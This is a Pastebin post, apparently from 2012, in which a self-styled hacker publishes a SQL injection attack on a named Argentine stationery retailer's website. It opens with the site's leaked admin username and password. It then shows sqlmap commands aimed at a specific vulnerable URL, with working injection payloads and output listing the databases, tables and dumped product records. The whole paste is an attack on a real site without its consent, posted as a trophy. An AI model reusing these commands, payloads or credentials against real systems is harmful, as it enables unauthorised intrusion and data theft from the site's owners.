Advertisement
Islam-Hacker

Database: prontolapiz.com.ar Published by JM511

Aug 24th, 2012
220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.69 KB | None | 0 0
  1. Published by JM511
  2. Follow me : www.twitter.com/JM511
  3. ------------ Saudi Arabian Hacker ----------------
  4.  
  5.  
  6. prontolapiz.com.ar
  7. Table: usuarios
  8. [1 entry]
  9. +-----------+-------+-------+-------+---------+---------------------+
  10. | usuarioID | ayn | nivel | clave | usuario | controlFecha |
  11. +-----------+-------+-------+-------+---------+---------------------+
  12. | 1 | Admin | admin | admin | admin | 2007-01-23 07:33:56 |
  13. +-----------+-------+-------+-------+---------+---------------------+
  14. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.prontolapiz.com.ar/novedadesVer.php?contenidoID=100 --dbs
  15.  
  16. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  17. http://sqlmap.org
  18.  
  19. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  20.  
  21. [*] starting at 15:37:08
  22.  
  23. [15:37:09] [INFO] testing connection to the target url
  24. [15:37:32] [INFO] testing if the url is stable, wait a few seconds
  25. [15:37:43] [INFO] url is stable
  26. [15:37:43] [INFO] testing if GET parameter 'contenidoID' is dynamic
  27. [15:37:44] [INFO] confirming that GET parameter 'contenidoID' is dynamic
  28. [15:37:45] [INFO] GET parameter 'contenidoID' is dynamic
  29. [15:37:45] [INFO] heuristics detected web page charset 'ascii'
  30. [15:37:45] [INFO] heuristic test shows that GET parameter 'contenidoID' might be injectable (possible DBMS: MySQL)
  31. [15:37:45] [INFO] testing for SQL injection on GET parameter 'contenidoID'
  32. [15:37:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  33. [15:37:46] [WARNING] reflective value(s) found and filtering out
  34. [15:37:57] [INFO] GET parameter 'contenidoID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  35. [15:37:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  36. [15:37:58] [INFO] GET parameter 'contenidoID' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
  37. [15:37:58] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  38. [15:37:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  39. [15:38:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  40. [15:38:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
  41. [15:38:06] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  42. [15:38:15] [INFO] target url appears to have 14 columns in query
  43. [15:38:17] [INFO] GET parameter 'contenidoID' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  44. GET parameter 'contenidoID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  45. sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
  46. ---
  47. Place: GET
  48. Parameter: contenidoID
  49. Type: boolean-based blind
  50. Title: AND boolean-based blind - WHERE or HAVING clause
  51. Payload: contenidoID=100 AND 7790=7790
  52.  
  53. Type: error-based
  54. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  55. Payload: contenidoID=100 AND (SELECT 7856 FROM(SELECT COUNT(*),CONCAT(0x3a6b79733a,(SELECT (CASE WHEN (7856=7856) THEN 1 ELSE 0 END)),0x3a66676c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  56.  
  57. Type: UNION query
  58. Title: MySQL UNION query (NULL) - 14 columns
  59. Payload: contenidoID=100 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6b79733a,0x4553564f626866466748,0x3a66676c3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  60. ---
  61.  
  62. [15:39:26] [INFO] the back-end DBMS is MySQL
  63.  
  64. web application technology: Apache, PHP 5.2.17
  65. back-end DBMS: MySQL 5.0
  66. [15:39:26] [INFO] fetching database names
  67. [15:39:27] [INFO] the SQL query used returns 2 entries
  68. [15:39:30] [INFO] retrieved: "information_schema"
  69. [15:39:31] [INFO] retrieved: "lapiz_lapiz"
  70. available databases [2]:
  71. [*] information_schema
  72. [*] lapiz_lapiz
  73.  
  74. [15:39:31] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.prontolapiz.com.ar'
  75.  
  76. [*] shutting down at 15:39:31
  77.  
  78. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.prontolapiz.com.ar/novedadesVer.php?contenidoID=100 -D lapiz_lapiz --tables
  79.  
  80. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  81. http://sqlmap.org
  82.  
  83. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  84.  
  85. [*] starting at 15:39:41
  86.  
  87. [15:39:42] [INFO] resuming back-end DBMS 'mysql'
  88. [15:39:42] [INFO] testing connection to the target url
  89. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  90. ---
  91. Place: GET
  92. Parameter: contenidoID
  93. Type: boolean-based blind
  94. Title: AND boolean-based blind - WHERE or HAVING clause
  95. Payload: contenidoID=100 AND 7790=7790
  96.  
  97. Type: error-based
  98. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  99. Payload: contenidoID=100 AND (SELECT 7856 FROM(SELECT COUNT(*),CONCAT(0x3a6b79733a,(SELECT (CASE WHEN (7856=7856) THEN 1 ELSE 0 END)),0x3a66676c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  100.  
  101. Type: UNION query
  102. Title: MySQL UNION query (NULL) - 14 columns
  103. Payload: contenidoID=100 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6b79733a,0x4553564f626866466748,0x3a66676c3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  104. ---
  105.  
  106. [15:39:46] [INFO] the back-end DBMS is MySQL
  107.  
  108. web application technology: Apache, PHP 5.2.17
  109. back-end DBMS: MySQL 5.0
  110. [15:39:46] [INFO] fetching tables for database: 'lapiz_lapiz'
  111. [15:39:47] [INFO] the SQL query used returns 3 entries
  112. [15:39:48] [INFO] retrieved: "contenidos"
  113. [15:39:49] [INFO] retrieved: "contenidos_secciones"
  114. [15:39:50] [INFO] retrieved: "usuarios"
  115. Database: lapiz_lapiz
  116. [3 tables]
  117. +----------------------+
  118. | contenidos |
  119. | contenidos_secciones |
  120. | usuarios |
  121. +----------------------+
  122.  
  123. [15:39:50] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.prontolapiz.com.ar'
  124.  
  125. [*] shutting down at 15:39:50
  126.  
  127. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.prontolapiz.com.ar/novedadesVer.php?contenidoID=100 -D lapiz_lapiz --dump
  128.  
  129. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  130. http://sqlmap.org
  131.  
  132. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  133.  
  134. [*] starting at 15:40:01
  135.  
  136. [15:40:01] [INFO] resuming back-end DBMS 'mysql'
  137. [15:40:01] [INFO] testing connection to the target url
  138. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  139. ---
  140. Place: GET
  141. Parameter: contenidoID
  142. Type: boolean-based blind
  143. Title: AND boolean-based blind - WHERE or HAVING clause
  144. Payload: contenidoID=100 AND 7790=7790
  145.  
  146. Type: error-based
  147. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  148. Payload: contenidoID=100 AND (SELECT 7856 FROM(SELECT COUNT(*),CONCAT(0x3a6b79733a,(SELECT (CASE WHEN (7856=7856) THEN 1 ELSE 0 END)),0x3a66676c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  149.  
  150. Type: UNION query
  151. Title: MySQL UNION query (NULL) - 14 columns
  152. Payload: contenidoID=100 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6b79733a,0x4553564f626866466748,0x3a66676c3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  153. ---
  154.  
  155. [15:40:12] [INFO] the back-end DBMS is MySQL
  156.  
  157. web application technology: Apache, PHP 5.2.17
  158. back-end DBMS: MySQL 5.0
  159. [15:40:12] [INFO] fetching tables for database: 'lapiz_lapiz'
  160. [15:40:12] [INFO] the SQL query used returns 3 entries
  161. [15:40:12] [INFO] resumed: "contenidos"
  162. [15:40:12] [INFO] resumed: "contenidos_secciones"
  163. [15:40:12] [INFO] resumed: "usuarios"
  164. [15:40:12] [INFO] fetching columns for table 'contenidos' in database 'lapiz_lapiz'
  165. [15:40:13] [INFO] the SQL query used returns 14 entries
  166. [15:40:14] [INFO] retrieved: "contenidoID","int(3) unsigned"
  167. [15:40:17] [INFO] retrieved: "fecha","date"
  168. [15:40:21] [INFO] retrieved: "seccionID","int(3) unsigned"
  169. [15:40:22] [INFO] retrieved: "volanta","varchar(200)"
  170. [15:40:23] [INFO] retrieved: "titulo","varchar(200)"
  171. [15:40:24] [INFO] retrieved: "copete","mediumtext"
  172. [15:40:26] [INFO] retrieved: "contenido","mediumtext"
  173. [15:40:27] [INFO] retrieved: "foto","varchar(50)"
  174. [15:40:28] [INFO] retrieved: "epigrafe","varchar(50)"
  175. [15:40:29] [INFO] retrieved: "link","varchar(100)"
  176. [15:40:32] [INFO] retrieved: "recurso","varchar(100)"
  177. [15:40:33] [INFO] retrieved: "autor","varchar(100)"
  178. [15:40:35] [INFO] retrieved: "controlCarga","timestamp"
  179. [15:40:36] [INFO] retrieved: "controlVisible","char(1)"
  180. [15:40:36] [INFO] fetching entries for table 'contenidos' in database 'lapiz_lapiz'
  181. [15:40:37] [INFO] the SQL query used returns 112 entries
  182. [15:40:39] [INFO] retrieved: "none","BemoBemo","7","0000-00-00 00:00:00","x","BemoBemo","Bemo","2010-03-20","Bemo.jpg","www.link.com","No...
  183. [15:40:39] [INFO] retrieved: "2305","<p>Un dise&ntilde;o atemporal que inspira ideas perdurables.<br />\\r\\nEs la expresi&oacute;n de la...
  184. [15:40:40] [INFO] retrieved: "3308","<p>Un dise&ntilde;o atemporal que inspira ideas perdurables. Es la expresi&oacute;n de la belleza et...
  185. [15:40:41] [INFO] retrieved: "Demo Alias Demo","Demo Segunda Etapara Modficacion \\r\\nDemo Segunda Etapara Modficacion DemoDemo Demo","3...
  186. [15:40:43] [INFO] retrieved: "2316","<p>Tenga una pieza de arte moderno entre sus dedos. Expr&eacute;sese en coloresa audaces, disfr&uacu...
  187. [15:40:44] [INFO] retrieved: "manuel","demo","14","2005-10-11 09:56:30","1","demo","demo manu","2005-10-11","C:PHPuploadtempphpADE.tmp","...
  188. [15:40:46] [INFO] retrieved: "demo","demo contenido demo contenido demo contenido demo contenido demo contenido \\r\\ndemo contenido demo...
  189. [15:40:46] [INFO] retrieved: "demo cita","demo cita","10","2005-10-03 12:04:44","1","demo cita","demo cita","2005-10-03","foto1.jpg","dem...
  190. [15:41:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
  191. [15:41:03] [INFO] retrieved: "simar demo","<p>simar demo</p>","23","2007-06-18 07:58:36","1","simar demo","simar demo","2005-10-11","imag...
  192. [15:41:04] [INFO] retrieved: "1007","<p>Numeradoras autom&aacute;ticas, hasta 12 repeticiones.<br />\\r\\nTama&ntilde;o del tipo: 5mm<br ...
  193. [15:41:04] [INFO] retrieved: "0001","<p>360 (OMO300).<br />\\r\\nAM87 COLECTION (8341).<br />\\r\\nCELULOIDE (87511).<br />\\r\\nJERUSALE...
  194. [15:41:05] [INFO] retrieved: "1129642","<p>Repuestos para bol&iacute;grafos.<br />\\r\\nTrazo fino, medio y grueso.<br />\\r\\nColores: n...
  195. [15:41:06] [INFO] retrieved: "MARIANO EL GRANDE"," ASD ASD ASFD A?F AFJSDG FSDL?G JVS?LJBJB","37","2006-02-01 12:24:38","1","ADASDASD"," ...
  196. [15:41:07] [INFO] retrieved: "0000","<p>Transparencias.</p>","88","2007-10-29 11:46:01","1"," ","Transparencias","2007-10-16","autodesk-p...
  197. [15:41:07] [INFO] retrieved: "0001","<p>Modelos:<br />\\r\\n&bull;PB2-230 (c&oacute;d. PB2-230).<br />\\r\\n&bull;PB1 (c&oacute;d. PB1)</...
  198. [15:41:08] [INFO] retrieved: "4850","<p>Impresora de cupones modelo 4850.</p>","77","2007-11-03 08:27:01","1"," "," ","2007-10-16","cup-b...
  199. [15:41:09] [INFO] retrieved: "1535","<p>Modelos Rotuladoras:<br />\\r\\n1535<br />\\r\\n1540<br />\\r\\n1575<br />\\r\\n1847.56</p>","78"...
  200. [15:41:10] [INFO] retrieved: "PC82T6","<p>Film&iacute;nas.</p>","79","2007-10-29 11:20:23","1"," "," ","2007-10-16"," "," "," ","20","FIL...
  201. [15:41:11] [INFO] retrieved: "1022204","<p>Cintas Adhesivas<br />\\r\\n<strong><br />\\r\\nPresentadas en dos medidas: <br />\\r\\n</stro...
  202. [15:41:11] [INFO] retrieved: "0000","<p>Pol&iacute;mero L&iacute;quido de 2 Kg <br />\\r\\nFilm base 0125 micrones <br />\\r\\n25x35 cm: ...
  203. [15:41:26] [INFO] retrieved: "Ofertas","<p><strong><font color="#ff0000">BOLSA ESCOLAR</font></strong></p>\\r\\n<table cellspacing="0" co...
  204. [15:41:27] [INFO] retrieved: "N914","<p>Asegure sus cheques con positiva protecci&oacute;n.</p>","44","2007-10-29 11:38:37","1"," "," ","...
  205. [15:41:32] [INFO] retrieved: "N260","<p>Perforadora punch N260<br />\\r\\nPerfora hasta 100 hojas.</p>","87","2007-10-29 11:41:17","1"," ...
  206. [15:41:33] [INFO] retrieved: "0000","<p>Etiquetas para Ink Jet</p>","89","2007-10-29 11:47:00","1"," "," ","2007-10-16","mayspies.jpg"," ...
  207. [15:41:42] [INFO] retrieved: "36R","<p>Goma de miga de pan,<br />\\r\\nmuy suave recomendable para escolares.</p>","90","2007-10-29 11:49...
  208. [15:41:42] [INFO] retrieved: "1171452","<p>Atlas Rondi HB 0.5.</p>","91","2007-10-29 11:59:36","1"," "," ","2007-10-16"," "," "," ","35",...
  209. [15:41:43] [INFO] retrieved: "0001","<p>&bull;124 sp<br />\\r\\n&bull;227<br />\\r\\n&bull;227C<br />\\r\\n&bull;236<br />\\r\\n&bull;431...
  210. [15:41:44] [INFO] retrieved: "95","<p>Modelo 95.</p>","161","2007-11-03 08:39:42","1"," "," ","2007-10-29","perf-petrus.jpg"," "," ","24"...
  211. [15:41:48] [INFO] retrieved: "1000011","<p>Plastilinas en estuche x 10 colores.<br />\\r\\nTambien vienen presentadas en blister x 10 col...
  212. [15:41:54] [INFO] retrieved: "1030117","<p>Plastilinas Kiwi presentado en cajas x 24 unidades.</p>","95","2007-10-29 12:02:09","1"," "," ...
  213. [15:41:55] [INFO] retrieved: "0001","<p><font size="2">C&oacute;digo: BZ038<br />\\r\\nMedida: 38x51mm <br />\\r\\nC&oacute;digo: BZ050<b...
  214. [15:41:59] [INFO] retrieved: "1100504","<p>Ganchos para pared - Soportan hasta 12 Kg.</p>","151","2007-10-29 12:03:14","1"," "," ","2007-...
  215. [15:42:00] [INFO] retrieved: " "," ere re er ere rer er","46","2007-01-22 13:28:05","0","tetrer efr e er "," ","2007-01-22"," "," ","arti...
  216. [15:42:00] [INFO] retrieved: "3311","<p>Un dise&ntilde;o atemporal que inspira ideas perdurables.<br />\\r\\nEs la expresi&oacute;n de la...
  217. [15:42:01] [INFO] retrieved: " ","rwerwer","50","2007-01-22 13:32:52","1","werwer"," ","2006-01-20"," "," ","ch16_server_admin.pdf","3","...
  218. [15:42:04] [INFO] retrieved: "2312","<p>Tenga una pieza de arte moderno entre sus dedos. Expr&eacute;sese en coloresa audaces, disfr&uacu...
  219. [15:42:05] [INFO] retrieved: "2311","<p>Tenga una pieza de arte moderno entre sus dedos. Expr&eacute;sese en coloresa audaces, disfr&uacu...
  220. [15:42:08] [INFO] retrieved: "1414976","<p>Diskettes de 3 1/2 '</p>","61","2007-11-03 08:16:24","1"," "," ","2007-08-25","disk-datace.jpg...
  221. [15:42:09] [INFO] retrieved: " ","<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Proin et risus. Praesent tellus dui, inter...
  222. [15:42:09] [INFO] retrieved: " ","<p><strong><font color="#ff0000">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Proin et ris...
  223. [15:42:10] [INFO] retrieved: " ","<p>$oFCKeditor-&gt;<strong>Create();</strong></p>","56","2007-06-18 06:18:52","1"," "," ","2007-06-19",...
  224. [15:42:11] [INFO] retrieved: " ","<p>BemoBemo</p>","57","2007-06-18 06:57:48","1"," "," ","2007-06-18"," "," "," ","3","Ahora saque el co...
  225. [15:42:12] [INFO] retrieved: " ","<p>Descripci&oacute;n del Producto. Caracter&iacute;sticas.</p>","60","2007-08-25 10:27:40","1"," "," "...
  226. [15:42:14] [INFO] retrieved: "008214","<p>BOLIGRAFOS<br />\\r\\nAT SATIN CHROME&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs...
  227. [15:42:15] [INFO] retrieved: "0001","<p>Amarillo-Negro (317103).<br />\\r\\nAzul-Blanco (310175).<br />\\r\\nBlanco (310176).<br />\\r\\n...
  228. [15:42:16] [INFO] retrieved: "302130","<p>Acero Fino Pulido.<br />\\r\\nCuadros Cromados.<br />\\r\\nLacado Marmol Azul.<br />\\r\\nLacad...
  229. [15:42:16] [INFO] retrieved: "048","<p>Bol&iacute;grafos descartables c/capuchon.punta de metal,1mm<br />\\r\\nColores: azul,negro,rojo,v...
  230. [15:42:18] [INFO] retrieved: "0000","<p><strong><font face="Verdana">Bol&iacute;grafos descartables c/capuchon<br />\\r\\n</font></strong...
  231. [15:42:20] [INFO] retrieved: "001","<p>Sellos que se pueden considerar unos aut&eacute;nticos &quot;cl&aacute;sicos&quot;.<br />\\r\\nLos...
  232. [15:42:21] [INFO] retrieved: "0000","<p>Pinceles Da Vinci</p>","150","2007-10-29 12:02:45","1"," "," ","2007-10-27"," "," "," ","39","PIN...
  233. [15:42:23] [INFO] retrieved: "00005","<p>Sello para placa de texto disponibles en diferentes tama&ntilde;os y colores.</p>","106","2007-1...
  234. [15:42:24] [INFO] retrieved: "00004","<p>Hemos perfeccionado a&uacute;n m&aacute;s el sello autoentintador con almohadilla integrada m&aa...
  235. [15:42:25] [INFO] retrieved: "00003","<p>Almohadilla integrada es el que se utiliza en el &aacute;mbito profesional.<br />\\r\\nSu lidera...
  236. [15:42:30] [INFO] retrieved: "00002","<p>Tampones para sellos en 3 tama&ntilde;os:</p>\\r\\n<p>9051 Tama&ntilde;o: 9 x 5 cm<br />\\r\\n90...
  237. [15:42:32] [INFO] retrieved: "202","<p>&bull;Bambina 202.</p>","110","2007-10-29 11:27:44","1"," "," ","2007-10-19"," "," "," ","24","ABR...
  238. [15:42:33] [INFO] retrieved: "broches","<p>&bull; b/202....caja ....por 600<br />\\r\\n&bull; b/330/10..caja..por.1000....para cable<br /...
  239. [15:42:33] [INFO] retrieved: "clavadoras","<p>&bull;Clavadora ..330<br />\\r\\n&bull;Clavadora...530/260 (derby)<br />\\r\\n&bull;Clavado...
  240. [15:42:35] [INFO] retrieved: "00004","<p>&bull;Abrochadora electrica m8000 beige,negra(26/6)</p>\\r\\n<p>&bull;Abrochadora electrica mes ...
  241. [15:42:36] [INFO] retrieved: "00003","<p>&bull;Etiquetadora MX..5500 para codigo y precio</p>\\r\\n<p>&nbsp;</p>","115","2007-11-03 08:49...
  242. [15:42:37] [INFO] retrieved: "00002","<p>&bull;Rollo MX 5500.........X 600 etiquetas<br />\\r\\n&bull;Entintador&nbsp;&nbsp;&nbsp;&nbsp; ...
  243. [15:42:38] [INFO] retrieved: "00001","<p>&bull;Almohadilllas<br />\\r\\n&bull;S1 azul,incolora,negra,roja,verde,violeta ...9X5 cm<br />\\...
  244. [15:42:38] [INFO] retrieved: "00005","<p>&bull;ABROCHADORA ELECTRICA<br />\\r\\nUtiliza broches 26/6<br />\\r\\nOrigen: EE.UU.</p>","118"...
  245. [15:42:39] [INFO] retrieved: "100438","<p>ABROCHADORAS</p>\\r\\n<p>abrochadora HD AZUL,GRIS (10/50)</p>\\r\\n<p>abrochadora pinza hp-10 (...
  246. [15:42:40] [INFO] retrieved: "049","<p>boligrafo descartable c/capuchon punta metalica de 0,7 mm<br />\\r\\ncolores: azul, negro,rojo,ver...
  247. [15:42:45] [INFO] retrieved: "812131","<p>RETRACTILES<br />\\r\\n812-x-TRA TINTA AZUL Y NEGRA<br />\\r\\n816 -&nbsp; VIBRANT<br />\\r\\nC...
  248. [15:42:51] [INFO] retrieved: "REPUESTOS","<p>REPUESTOS</p>\\r\\n<p>BLISTER TANQUE COMPATIBLE CROSS,AZUL,NEGRO MEDIO</p>\\r\\n<p>TANQUE CO...
  249. [15:42:51] [INFO] retrieved: "278304","<p>BORRRATINTAS</p>\\r\\n<p>MAGICO 027 PUNTA FINA</p>\\r\\n<p>MAGICO 028 PUNTA CHANFLEADA</p>","12...
  250. [15:42:52] [INFO] retrieved: "BROCHES","<p>BROCHES</p>\\r\\n<p>BROCHES NUMERO 10 CAJA X 1000</p>\\r\\n<p>BROCHES NUMERO 26/6 CAJA X 1000<...
  251. [15:42:53] [INFO] retrieved: "00001","<p>BROCHES</p>\\r\\n<p>BROCHES NUMERO 10 CAJA X 1000</p>","125","2007-10-25 08:56:51","1"," "," ","...
  252. [15:42:54] [INFO] retrieved: "archivos","<p>ARCHIVOS</p>\\r\\n<p>archivo con separador aro 3cm A4......F113</p>\\r\\n<p>archivo con separ...
  253. [15:42:54] [INFO] retrieved: "CARPETAS C/FOLIOS","BemoBemo","127","2007-10-23 08:51:42","1"," "," ","2007-10-19"," "," "," ","22","CARPET...
  254. [15:42:56] [INFO] retrieved: "CARPETAS","<p>CARPETAS</p>\\r\\n<p>CARPETAS C/10 FOLIOS&nbsp; A4....................D107</p>\\r\\n<p>&nbsp;...
  255. [15:42:57] [INFO] retrieved: "CARPETAS C/FUELLES","<p>CARPETAS CON FUELLES</p>\\r\\n<p>CON 12 DIVISIONES A4.........................E101 ...
  256. [15:42:58] [INFO] retrieved: "CARPETAS C/CLIP","<p>CARPETAS C/CLIP</p>\\r\\n<p>TAPA TRANSPARENTE CLIP OSCILO OFICIO........3024</p>\\r\\n...
  257. [15:42:58] [INFO] retrieved: "TARJETEROS","<p>TARJETEROS</p>\\r\\n<p>ESQUELA PARA 120 TARJETAS...................................N101</p>...
  258. [15:42:59] [INFO] retrieved: "REVISTERO","<p>REVISTERO</p>\\r\\n<p>LOMO 70 MM.............................4019</p>","134","2007-10-23 09:...
  259. [15:43:00] [INFO] retrieved: "SOBRES","<p>SOBRES</p>\\r\\n<p>C/LOMO&nbsp; 3CM CON BROCHE A4....................A105</p>\\r\\n<p>TRANSPARE...
  260. [15:43:02] [INFO] retrieved: "CARTUCHOS","<p>CARTUCHOS</p>\\r\\n<p>AZUL LAVABLE CAJA X 5 UNIDADES</p>","136","2007-10-23 10:03:29","1"," ...
  261. [15:43:04] [INFO] retrieved: "000002","<p>CARTUCHOS</p>\\r\\n<p>AZUL&nbsp;LAVABLE, ROJO, NEGRO, VERDE, CAJA X 6 UNIDADES</p>","137","2007...
  262. [15:43:17] [INFO] retrieved: "CINTAS ADHESIVAS","<p>CINTAS ADHESIVAS</p>\\r\\n<p>P/EMBALAJE 48MM X100 TRANSPARENTE</p>\\r\\n<p>P/EMBALAJE...
  263. [15:43:17] [INFO] retrieved: "PORTARROLLO","<p>PORTARROLLOS</p>\\r\\n<p>PARA OFICINA</p>\\r\\n<p>PRA EMBALAJE</p>","139","2007-10-23 10:1...
  264. [15:43:18] [INFO] retrieved: "000002","<p>COMPASES</p>\\r\\n<p>NUMERO N101 B</p>\\r\\n<p>NUMERO N101 L</p>\\r\\n<p>NUMERO N203 T</p>\\r\\...
  265. [15:43:19] [INFO] retrieved: "00001","<p>COMPASES</p>\\r\\n<p>N 124 SP</p>\\r\\n<p>N 227</p>\\r\\n<p>N227C</p>\\r\\n<p>N236 C</p>\\r\\n<p...
  266. [15:43:23] [INFO] retrieved: "0000","<p>CORRECTORES<br />\\r\\nBLISTER CORRECTOR ROLLING BALL<br />\\r\\nCORRECTOR PRESSURE SYSTEM</p>","...
  267. [15:43:39] [INFO] retrieved: "CORRECTORES","<p>CORRECTORES</p>\\r\\n<p>LAPIZ CORR.</p>\\r\\n<p>NEW VINCHER</p>","143","2007-11-03 08:42:3...
  268. [15:43:41] [INFO] retrieved: "052090","<p>&bull;BASES DE ESCRITORIO<br />\\r\\n&bull;BASE BORGO&Ntilde;A DOBLE ENCHAPADO 10KT.....5209<br...
  269. [15:43:42] [INFO] retrieved: "0011630","<p>LAPICES</p>\\r\\n<p>BLUE</p>\\r\\n<p>CLASSIC BLACK</p>\\r\\n<p>CROMO</p>\\r\\n<p>CROMO RESTAGE...
  270. [15:43:43] [INFO] retrieved: "0011616","<p>BLUE<br />\\r\\nBLUE DAMA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb...
  271. [15:43:44] [INFO] retrieved: "088601","<p>PAPICERAS FUENTE</p>\\r\\n<p>ATX MATTE CHROME&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n...
  272. [15:43:44] [INFO] retrieved: "088502","<p>ATX PURE CHROME<br />\\r\\nATX MEDALIST<br />\\r\\nENCHAPADO 14KT<br />\\r\\nCLASSIC BLACK REST...
  273. [15:44:16] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  274. [15:44:21] [INFO] retrieved: "009254","<p>REPUESTOS PARA BOLIGRAFOS<br />\\r\\nTANQUE JUMBO NM-AM<br />\\r\\nTANQUE PARA ROLLING ION NEGR...
  275. [15:44:22] [INFO] retrieved: "1183573","<p>x 6 unidades<br />\\r\\nColores: Azul, Negro, Azul-Negro, Rojo y Verde</p>","158","2007-11-03 ...
  276. [15:44:23] [INFO] retrieved: "0000","<p>Papeles Alta Resoluci&oacute;n</p>","154","2007-10-29 11:46:40","1"," "," ","2007-10-27","mayspie...
  277. [15:44:25] [INFO] retrieved: "0000","<p>Transparencias.</p>","155","2007-10-29 11:46:18","1"," ","Transparencias","2007-10-27","mayspies-...
  278. [15:44:26] [INFO] retrieved: "0000","<p>Papel Tipo Glossy x 25 unidades 240 gr.</p>","156","2007-10-29 11:45:41","1"," ","Papel Tipo Glos...
  279. [15:44:27] [INFO] retrieved: "0000","<p>BAILARINAS<br />\\r\\nANIMALES<br />\\r\\nCARICATURAS<br />\\r\\nDESNUDOS<br />\\r\\nEL DIBUJO AN...
  280. [15:44:27] [INFO] retrieved: "1129567","<p>Colores Negro y Azul</p>","159","2007-11-03 08:11:28","1"," "," ","2007-10-29","roller-mb.jpg"...
  281. [15:44:28] [INFO] retrieved: "1125699","<p>Colores: Azul, Negro y Azul-Negro.</p>","160","2007-11-03 08:09:21","1"," "," ","2007-10-29","...
  282. [15:44:29] [INFO] retrieved: "1030312","<p>&bull;M&aacute;quina sacapuntas KS, con 8 bocas diferentes, cuerpo met&aacute;lico para atorni...
  283. [15:44:31] [INFO] retrieved: "EC-50","<p>Protectora de cheques electr&oacute;nica.</p>","163","2007-10-29 11:36:43","1"," "," ","2007-10-...
  284. [15:44:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
  285. [15:44:49] [INFO] retrieved: "RZ-A","<p>Sacabroches.</p>","164","2007-10-29 11:37:48","1"," "," ","2007-10-29"," "," "," ","28","ACCESORI...
  286. [15:44:50] [INFO] retrieved: "500","<p>Protectora de cheques manual.</p>","165","2007-10-29 11:41:50","1"," "," ","2007-10-29"," "," "," ...
  287. [15:44:51] [INFO] retrieved: "IM40","<p>Goma de caucho natural, para tinta y lapiz.</p>","166","2007-10-29 11:50:45","1"," "," ","2007-10...
  288. [15:44:51] [INFO] retrieved: "IM30","<p>Goma de caucho natural, para tinta y lapiz.</p>","167","2007-10-29 11:51:03","1"," "," ","2007-10...
  289. [15:44:56] [INFO] retrieved: "INK30","<p>Goma de caucho, abrasiva, para tinta y bol&iacute;grafo.</p>","168","2007-10-29 11:52:03","1"," ...
  290. [15:45:20] [INFO] retrieved: "LX24","<p>Goma de borrar muy suave, biselada, ideal para borrar sobre las superficies mas suaves.</p>","169...
  291. [15:45:20] [INFO] retrieved: "LX24","<p>Goma de borrar muy suave, biselada, ideal para borrar sobre las superficies mas suaves.</p>","170...
  292. [15:45:22] [INFO] retrieved: "P12","<p>Goma de pl&aacute;stico, ideal para borrar lapiz sobre toda clase de papel. Sobreenvueltas en celo...
  293. [15:45:23] [INFO] retrieved: "P24","<p>Goma de pl&aacute;stico, ideal para borrar lapiz sobre toda clase de papel. Sobreenvueltas en celo...
  294. [15:45:24] [INFO] retrieved: "P36","<p>Goma de pl&aacute;stico, escolar.</p>","173","2007-10-29 11:55:55","1"," "," ","2007-10-29"," "," ...
